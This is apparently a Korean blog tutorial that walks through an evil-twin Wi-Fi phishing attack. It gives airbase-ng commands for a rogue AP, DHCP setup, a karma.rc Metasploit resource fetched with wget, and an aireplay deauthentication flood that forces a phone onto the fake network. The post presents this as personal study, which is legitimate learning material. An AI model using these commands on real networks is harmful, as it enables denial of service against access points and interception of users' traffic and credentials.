==============================================================================
:: WARNING ::
이 포스트는 개인 공부를 위해 게시된 글입니다. 악의적으로 이용시 모든 책임은 당사자에게 있고 작성자는 관련없음을 알려드립니다.
==============================================================================
0x00. Phishing Attack
말 그대로 낚시공격입니다. 해커가 구축한 가상 AP에 접속을 시켜 해커가 원하는 정보를 취득하는 공격법입니다.
※해커가 구축한 AP에 접속시키는 방법
- 기존 접속된 AP에 DoS(서비스거부)공격을 가하여 접속을 끊게 한 후 해커의 AP에 재접속하는 경우
- 해커의 AP신호세기가 기존 AP신호보다 강할 경우
=>이 글에서는 위의 두가지 내용을 순서대로 수행했습니다.
0x01. Ready for phishing
제 컴퓨터 기준으로 말씀드리겠습니다.
- Back Track5 R3 (해킹 시스템) - AP로 작동중
- Samsung Galaxy3 (피해 시스템)
- 피해자로부터 응답 받을수 있는 DNS, HTTP서버(저는 karma.rc라는 툴을 이용하겠습니다.)
0X02. Start Attack
#iwconfig
공격 전에 네트워크가 작동되고 있는지 확인을 하고 시작합시다^-^
#airmon-ng start [네트워크이름] //wlan0를 모니터모드로 설정
#airbase-ng -c [채널] -e [가상 AP이름] -y -v [Interface]
// 채널 11, "test"라는 이름으로 가상 AP생성
// airbase-ng를 실행하면 가상AP Interface인 at0가 생성됨
#ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
#route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
// 접속된 Station에게 DHCP로 10.0.0.0의 영역대 IP를 부여
DHCP서버를 실행시키기 전 아래와 같이 설정
#dhcpd3 -cf [dhcpd.conf파일 위치] at0 // DHCP서버 시작
사용자로부터 응답을 받을수있는 DNS, HTTP서버가 필요합니다. 여기서 저는 karma.rc라는 툴을 이용하겠습니다. [wget http://digitaloffense.net/tools/karma.rc]
#msfconsole -r [karma.rc파일위치] //msfconsole로 karma.rc실행
#airodump-ng mon0
::근거리의 무선네트워크를 모니터할 수 있습니다. 위에서 airbase-ng로 test라는 AP가 생성되었으며 사용자(98:52:B1:60:0B:10)는 lstiptm이라는 공유기에 접속된 것을 확인할 수 있습니다.
동시에 결과를 확인하기위해 세장의 이미지를 붙였습니다.(차례 1번, 2번, 3번이라 칭함)
우선 2번이미지는 #aireplay -0 0 -a [AP MAC주소] mon0 라는 명령어를 실행시킨 결가입니다. 이 명령어를 실행시키면 해당 AP에 Dos공격이 실행되서 AP에 연결된 기기가 끊기게 됩니다.
1번 이미지는 #airmon-ng mon0 실행시킨 이미지인데, DoS를 실행시키자 사용자(98:52:B1:60:0B:10)가 test(00:22:FA:47:9F:34)에 접속한 것을 확인할수 있습니다.
드디어 사용자가 해커가 만든 가상 AP에 접속되었습니다!!
'Security > [리얼] Network' 카테고리의 다른 글
bluetooth hacking_pdf (1) | 2014.09.15 |
---|---|
bluetooth를 이용한 안드로이드폰 제어 (10) | 2014.02.07 |
블루투스 이어셋(해드폰) 해킹 (17) | 2013.08.14 |
[펌]허브,라우터,스위치 (0) | 2010.10.10 |